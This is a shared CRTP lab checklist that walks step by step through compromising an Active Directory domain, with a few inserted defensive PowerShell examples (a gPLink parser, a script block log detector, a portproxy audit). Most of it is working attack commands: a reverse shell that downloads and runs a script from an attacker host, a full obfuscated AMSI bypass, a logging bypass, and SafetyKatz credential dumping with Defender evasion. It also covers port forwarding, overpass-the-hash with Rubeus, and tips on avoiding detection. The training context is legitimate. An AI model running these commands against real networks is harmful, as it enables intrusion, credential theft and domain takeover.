CRTP Command Checklists

Uploaded by lordhades0970

Objective 1: Enumerate the following for the dollarcorp domain:

-Users
-Computers
-Domain Administrators
-Enterprise Administrators
____________________
(~> marks a command to run)

# start a PowerShell session through InviShell to avoid enhanced logging

~> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# load PowerView into the PowerShell session

~> . C:\AD\Tools\PowerView.ps1

# enumerate the following

~> Get-DomainUser (1)
~> Get-DomainUser | select -ExpandProperty samaccountname (2)
~> Get-DomainComputer | select -ExpandProperty dnshostname (3)
~> Get-DomainGroup -Identity "Domain Admins" (4)
~> Get-DomainGroupMember -Identity "Domain Admins" (5)
~> Get-DomainGroupMember -Identity "Enterprise Admins" (6)
~> Get-DomainGroupMember -Identity "Enterprise Admins" -Domain moneycorp.local (7)

(1) List all the users in the domain.
(2) To list a specific property of all the users, we can use the Select-Object (or its alias select) cmdlet; for example, to list only the samaccountname.
(3) To enumerate member computers in the domain, use Get-DomainComputer (here selecting only the dnshostname).
(4) To see details of the Domain Admins group.
(5) To enumerate members of the Domain Admins group.
(6) To enumerate members of the Enterprise Admins group. Since dollarcorp is not the root domain, this command returns nothing.
(7) We need to query the root domain, as the Enterprise Admins group is present only in the root of a forest.
___________________________________________________________________________________

Objective 2: Enumerate the following for the dollarcorp domain:

-List all the OUs
-List all the computers in the StudentMachines OU
-List the GPOs
-Enumerate the GPOs applied on the StudentMachines OU
______________________________

~> Get-DomainOU (1)
~> Get-DomainOU | select -ExpandProperty name (2)
~> (Get-DomainOU -Identity StudentMachines).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name (3)
~> Get-DomainGPO (4)
~> (Get-DomainOU -Identity StudentMachines).gplink (5)
~> Get-DomainGPO -Identity '{7478F170-6A0C-490C-B355-9E4618BC785D}' (6)
~> Get-DomainGPO -Identity (Get-DomainOU -Identity StudentMachines).gplink.substring(11,(Get-DomainOU -Identity StudentMachines).gplink.length-72) (7)

(1) To list all the OUs, run this command after bypassing AMSI and loading PowerView.
(2) To see just the names of the OUs.
(3) Now, to list all the computers in the StudentMachines OU.
(4) Command to list the GPOs. Note that the name (not the displayname) of the group policies may be different in your lab instance.
(5) To enumerate the GPOs applied on the StudentMachines OU, we need to copy a part of the gplink attribute from the output of this command.
(6) Now, copy the GUID string from the gplink output (no square brackets, no semicolon and nothing after the semicolon) and use it here.
(7) It is possible to chain both commands into a single one, profiting from the fixed length of a GUID: substring(11, ...) skips the leading "[LDAP://cn=" and the length-72 trims that prefix plus the trailing DN and link option, which have a fixed length in this lab.
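The substring trick in (7) breaks as soon as the OU has more than one linked GPO or the DN length changes. Below is an added example, written for this page rather than taken from the checklist or from PowerView, that parses the whole gPLink attribute with a regular expression and reports each linked GPO with its link options (the same information a defender uses to audit which policies reach an OU). The function name ConvertFrom-GPLink and the second GUID in the sample are assumptions; the first GUID is the one quoted above.

```powershell
# Added example (not part of the original checklist): parse a gPLink value into
# the linked GPO DNs and their link options instead of relying on fixed
# substring offsets. The sample gPLink below is constructed for this example.
function ConvertFrom-GPLink {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)][string]$GPLink)

    process {
        # Each link looks like [<LDAP path>;<options>]; options is a bit field:
        # bit 0 (1) = link disabled, bit 1 (2) = link enforced.
        $pattern  = '\[(?<path>LDAP://[^;\]]+);(?<opt>\d+)\]'
        $position = 0
        foreach ($m in [regex]::Matches($GPLink, $pattern)) {
            $position++
            $opt  = [int]$m.Groups['opt'].Value
            $dn   = $m.Groups['path'].Value -replace '^LDAP://', ''
            # The GPO GUID is the cn of the policy object (braces included)
            $guid = if ($dn -match '^cn=(\{[0-9A-Fa-f-]+\})') { $Matches[1] } else { $null }
            [pscustomobject]@{
                Position          = $position   # index within the gPLink string
                GpoGuid           = $guid
                DistinguishedName = $dn
                Disabled          = [bool]($opt -band 1)
                Enforced          = [bool]($opt -band 2)
            }
        }
    }
}

# Constructed sample: two links, the second one enforced (the second GUID is a placeholder)
$sample = '[LDAP://cn={7478F170-6A0C-490C-B355-9E4618BC785D},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]' +
          '[LDAP://cn={AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;2]'
ConvertFrom-GPLink -GPLink $sample | Format-Table Position, GpoGuid, Disabled, Enforced

# With PowerView loaded, the same function resolves every GPO linked to an OU
# (assumption: Get-DomainOU and Get-DomainGPO are available as used above):
# (Get-DomainOU -Identity StudentMachines).gplink | ConvertFrom-GPLink |
#     ForEach-Object { Get-DomainGPO -Identity $_.GpoGuid }
```

Because the parser anchors on the `[...;n]` structure rather than on character offsets, it works for any number of links and any DN length, and the Disabled/Enforced flags show whether a link is actually in effect.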

___________________________________________________________________________________

Objective 3: Enumerate the following for the dollarcorp domain:

-ACL for the Domain Admins group
-All modify rights/permissions for the student
________

~> Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose (1)
~> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "student29"} (2) (*) yields no results
~> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} (3)

(1) Let's enumerate the ACLs for the Domain Admins group.
(2) Finally, to check for modify rights/permissions for studentx, we can use Find-InterestingDomainAcl from PowerView.
(3) Since studentx is a member of the RDPUsers group, let us check the permissions for it too.
___________________________________________________________________________________

Objective 4:

-Enumerate all domains in the moneycorp.local forest.
-Map the trusts of the dollarcorp.moneycorp.local domain.
-Map external trusts in the moneycorp.local forest.
-Identify external trusts of the dollarcorp domain. Can you enumerate trusts for a trusting forest?
________________

~> Get-ForestDomain -Verbose (1)
~> Get-DomainTrust (2)
~> Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"} (3)
~> Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"} (4)
~> Get-ForestDomain -Forest eurocorp.local | %{Get-DomainTrust -Domain $_.Name} (5)

(1) Enumerate all domains in the current forest.
(2) To map all the trusts of the dollarcorp domain.
(3) To list only the external trusts in the moneycorp.local forest.
(4) To identify the external trusts of the dollarcorp domain.
(5) Since the above is a bi-directional trust, we can extract information from the eurocorp.local forest. We need either a bi-directional trust or a one-way trust from eurocorp.local to dollarcorp to be able to use this command. Let's go for the last task and enumerate the trusts of the eurocorp.local forest.
___________________________________________________________________________________

Objective 5:
-Exploit a service on dcorp-studentx and elevate privileges to local administrator.
-Identify a machine in the domain where studentx has local administrative access.
-Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 - the dcorp-ci server.
_____________________________
*first run these

~> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
~> . C:\AD\Tools\PowerUp.ps1
~> Invoke-AllChecks

~> Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx' -Verbose (1)
(log off and log back in for the admin privileges)
~> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
~> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
~> Find-PSRemotingLocalAdminAccess (2)
~> winrs -r:dcorp-adminsrv cmd (3)
~> set username (3)
~> set computername (3)

(1) Let's use the abuse function Invoke-ServiceAbuse to add our current domain user to the local Administrators group.
(2) Now, for the next task, to identify a machine in the domain where studentx has local administrative access, use Find-PSRemotingLocalAdminAccess.ps1.
(3) So, studentx has administrative access on dcorp-adminsrv and on the student machine. We can connect to dcorp-adminsrv using winrs as the student user.

- powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress 172.16.100.29 -Port 443
(or)
- powershell.exe iex (iwr http://172.16.100.X/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.29 -Port 443

# The commands above are what we use to get a reverse shell (in this case by abusing the misconfigured Jenkins instance)

____________________________________________________________________________

Objective 6:
-Set up BloodHound and identify the shortest path to Domain Admins in the dollarcorp domain

________________

*BloodHound uses neo4j; exit BloodHound once you have stopped using it, as it uses a good amount of RAM. You may also want to stop the neo4j service if you are not using BloodHound.

_________________________________________________________________________________

Objective 7:

-Identify a machine in the target domain where a Domain Admin (DA) session is available.
-Compromise the machine and escalate privileges to Domain Admin
-Using access to dcorp-ci
-Using derivative local admin

~> iex (iwr http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing) (1)


~> S`eT-It`em ( 'V'+'aR' + 'IA' + (('b'+("{1}{0}"-f':1','lE'))+'q2') + ('uZ'+'x')
) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')
+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f(('U'+'ti')
+'l'),'A',('Am'+'si'),(('.'+'Man')+('ag'+'e')+('me'+'n')+'t.'),('u'+'to'+(("{1}
{0}"-f 'io','mat')+'n.')),'s',(('Sys'+'t')+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}"
-f('a'+('ms'+'i')),'d',('I'+('n'+'itF')+('a'+'ile')) ),( "{2}{4}{0}{1}{3}" -f
('S'+('t'+'at')),'i',(('N'+'on')+('Pu'+'bl')+'i'),'c','c,' ))."sE`T`VaLUE"( $
{n`ULl},${t`RuE} ) (2)
~> iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1')) (3)
~> Find-DomainUserLocation (4)
~> winrs -r:<UserDomain> set computername;set username (5)
~> winrs -r:<UserDomain> set username (6)

(1) Script block logging bypass (the script is sbloggingbypass)
(2) AMSI bypass
(3) Downloading the PowerView script
(4) We are checking whether any Domain Admin sessions are available (only works with PowerView loaded; AMSI bypass required)
(5) Here we want to use winrs
(6) Note that we are not running commands like "whoami", so that we are able to avoid detection

# *Note that we are using the first two commands to avoid detection: commands (1) and (2) allow us to run scripts like PowerView to locate useful information; in this case we are using PowerView to check for DA sessions in the target domain
# *Avoiding detection is the purpose that InviShell served up until now
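The script block logging and AMSI bypasses above rely on splitting cmdlet and member names with backticks, splicing strings with the -f format operator, and pulling code over HTTP into iex. Those same tricks are what a defender looks for in PowerShell script block logs (Event ID 4104). The following is an added example written for this page, not code from the checklist or from any tool it names: a triage function that scores a script block on those indicators. The function name, the weights and the three sample script blocks are assumptions constructed for the example; the Get-WinEvent call at the end assumes script block logging is enabled and that the script text sits in property index 2 of the event.

```powershell
# Added example (not part of the original checklist): triage PowerShell script
# block log entries (Event ID 4104) for the obfuscation tricks used above:
# backticks splitting cmdlet or member names, string splicing with the -f
# format operator, download-and-execute via iex, and AMSI references that only
# appear after the pieces are joined. The sample entries are constructed.
function Get-ScriptBlockIndicators {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)][string]$ScriptBlockText)

    process {
        # A backtick between two letters serves no purpose in normal code other
        # than breaking signature matching, so count those occurrences.
        $tickInName   = ([regex]::Matches($ScriptBlockText, '[A-Za-z]`[A-Za-z]')).Count
        # Format-operator splicing such as "{1}{0}" -f 'x','y'
        $formatSplice = ([regex]::Matches($ScriptBlockText, '"\{\d\}[^"]*"\s*-f\s')).Count
        # Normalise: drop backticks and join 'a'+'b' concatenations before keyword checks
        $normalized = $ScriptBlockText -replace '`', '' -replace "'\s*\+\s*'", ''
        $downloadExec = ($normalized -match '(iex|Invoke-Expression)[^\r\n]*(DownloadString|iwr|Invoke-WebRequest)') -or
                        ($normalized -match '(DownloadString|iwr|Invoke-WebRequest)[^\r\n]*\|\s*(iex|Invoke-Expression)')
        $amsiRef = $normalized -match 'AmsiUtils|amsiInitFailed|AmsiScanBuffer'

        # Simple additive score; weights are an assumption for this example
        $score = $tickInName + (2 * $formatSplice)
        if ($downloadExec) { $score += 3 }
        if ($amsiRef)      { $score += 5 }

        [pscustomobject]@{
            BacktickedNames = $tickInName
            FormatSplices   = $formatSplice
            DownloadExec    = $downloadExec
            AmsiReference   = $amsiRef
            Score           = $score
            Suspicious      = $score -ge 3
            Preview         = $ScriptBlockText.Substring(0, [Math]::Min(60, $ScriptBlockText.Length))
        }
    }
}

# Constructed sample script blocks: a routine admin command, a download-and-run,
# and an obfuscated fragment (not a working bypass) in the style seen above
$samples = @(
    'Get-Service | Where-Object Status -eq Running | Select-Object Name',
    'iex ((New-Object Net.WebClient).DownloadString(''http://172.16.100.X/PowerView.ps1''))',
    '$v = ( Get-varI`A`BLE ( (''1Q''+''2U'')+''zX'' ) -VaL )."A`ss`Embly"; $f = "{1}{0}" -f ''Utils'',''Amsi''; $v."g`etf`iElD"((''amsi''+''InitFailed''))'
)
$samples | Get-ScriptBlockIndicators |
    Format-Table BacktickedNames, FormatSplices, DownloadExec, AmsiReference, Score, Suspicious

# Live triage on a host with script block logging enabled (assumption: the
# operational log exists and Properties[2] holds the script block text):
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} |
#     ForEach-Object { $_.Properties[2].Value } | Get-ScriptBlockIndicators | Where-Object Suspicious
```

On the constructed samples the first block scores 0, the download-and-run scores 3, and the obfuscated fragment scores 13 (six backticked names, one format splice, and an AMSI reference that is only visible after the concatenation is collapsed). The point of the normalisation step is that string splicing defeats naive keyword matching but not a detector that joins the pieces first.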

# *We would now run SafetyKatz.exe on dcorp-mgmt to extract credentials from it. For that, we need to copy Loader.exe to dcorp-mgmt. Let's download Loader.exe on dcorp-ci and copy it from there to dcorp-mgmt, to avoid any download activity on dcorp-mgmt.
~> iwr http://<OurIP>/Loader.exe -OutFile C:\Users\Public\Loader.exe (1)
~> echo F | xcopy C:\Users\Public\Loader.exe \\<UserDomain>\C$\Users\Public\Loader.exe (2)

(1) Run on the reverse shell
(2) Now, copy Loader.exe to dcorp-mgmt (target_UserDomain)

# *From dcorp-ci (UserDomain), a request is sent to the DC to retrieve all computer names and the membership of the DA group; a request is then sent out to every machine in the domain

# *Never save or run anything from any of the temp directories as that is very "loud"
# *Note that Windows Defender on dcorp-mgmt (UserDomain) would detect SafetyKatz execution even when used with Loader. To avoid that, let's pass encoded arguments to the Loader

~> ArgSplit.bat (1)

(1) Pass encoded arguments to the Loader

output:

```
# [!] Argument Limit: 180 characters
[+] Enter a string: sekurlsa::ekeys
set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"
```

# The following steps are used to create the port forwarding

~> $null | winrs -r:<UserDomain> "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<OurIP>" (1)
~> $null | winrs -r:<UserDomain> C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit (2)

(1) Port forwarding command
(2) Loader fetches SafetyKatz.exe through the loopback port forward
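A netsh portproxy rule like the one above survives reboots and is easy to miss, which is why it is a standard item on a host audit. Below is an added example, written for this page rather than taken from the checklist, that lists the v4tov4 rules and flags any that relay traffic off the host. It reads the registry key where netsh persists these rules (assumption: values named "<listenaddress>/<listenport>" with data "<connectaddress>/<connectport>", as on current Windows versions); the function name Get-PortProxyRule and the sample hashtable are constructed for the example.

```powershell
# Added example (not part of the original checklist): audit netsh portproxy
# rules on a host. netsh persists v4tov4 rules under the PortProxy registry key,
# one value per listener named "<listenaddress>/<listenport>" with data
# "<connectaddress>/<connectport>" (assumption: this layout). Rules that
# forward to a non-loopback address are flagged as relaying off the host.
function Get-PortProxyRule {
    [CmdletBinding()]
    param(
        # Pass a hashtable of "listen/port" = "connect/port" to audit offline
        # (e.g. values exported from another host); omit it to read the live registry.
        [hashtable]$Rules
    )

    if (-not $Rules) {
        $Rules = @{}
        $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'
        if (Test-Path $key) {
            $item = Get-Item $key
            foreach ($name in $item.GetValueNames()) {
                $Rules[$name] = $item.GetValue($name)
            }
        }
    }

    foreach ($entry in $Rules.GetEnumerator()) {
        $listenAddr,  $listenPort  = $entry.Key   -split '/', 2
        $connectAddr, $connectPort = $entry.Value -split '/', 2
        # Loopback targets are local redirection; anything else means the host
        # is relaying traffic to another machine.
        $local = $connectAddr -in @('127.0.0.1', 'localhost', '::1')
        [pscustomobject]@{
            ListenAddress  = $listenAddr
            ListenPort     = [int]$listenPort
            ConnectAddress = $connectAddr
            ConnectPort    = [int]$connectPort
            RelaysOffHost  = -not $local
        }
    }
}

# Constructed sample: the rule created above plus a harmless local redirect
$sample = @{
    '0.0.0.0/8080'   = '172.16.100.X/80'
    '127.0.0.1/9000' = '127.0.0.1/9001'
}
Get-PortProxyRule -Rules $sample | Format-Table

# Live audit on a host, showing only rules that leave the machine:
# Get-PortProxyRule | Where-Object RelaysOffHost
```

In the sample the 0.0.0.0:8080 listener is reported with RelaysOffHost set, while the loopback-to-loopback rule is not. Running the live form periodically, or comparing its output against a known-good baseline, catches forwards added with `netsh interface portproxy add` regardless of whether the netsh command itself was logged.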

~> iwr http://<OurIP>/Safety.bat -OutFile C:\Users\Public\Safety.bat (1)
~> echo F | xcopy C:\Users\Public\Safety.bat \\dcorp-mgmt\C$\Users\Public\Safety.bat (2)
~> $null | winrs -r:dcorp-mgmt "cmd /c C:\Users\Public\Safety.bat" (3)

(1) Download the batch file on dcorp-ci. Run these commands on the reverse shell
(2) Now, copy Safety.bat to dcorp-mgmt (target_UserDomain)
(3) Run Safety.bat on dcorp-mgmt (target_UserDomain); it uses Loader.exe to download and execute SafetyKatz.exe in memory on dcorp-mgmt

# SWEET!! We found Domain Admin creds: look for the "aes256_hmac" entry in the output, which appears as an alphanumeric string

# Next we will be using Overpass-the-Hash to start a session on the domain controller using the Domain Admin creds we just found.

~> Rubeus.exe asktgt /user:svcadmin /aes256:<alphanumeric code> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt (svcadmin is the Domain Admin)

~> winrs -r:<DomainController> cmd (1)
~> set username (2)
~> logoff (3)

(1) Interacting with the DC using the new creds (elevated privileges)
(2) Checking that our current user has the elevated privs
(3) Log out and log back in to use the new DA privs

# *Now that we have Domain Administrator privileges on the Domain Controller we have FULL control over ALL the machines/objects in the domain

# We can access whatever machine we want in the ENTIRE domain/forest/enterprise

!!!!!FULL DOMAIN DOMINATION!!!!!!!!!!!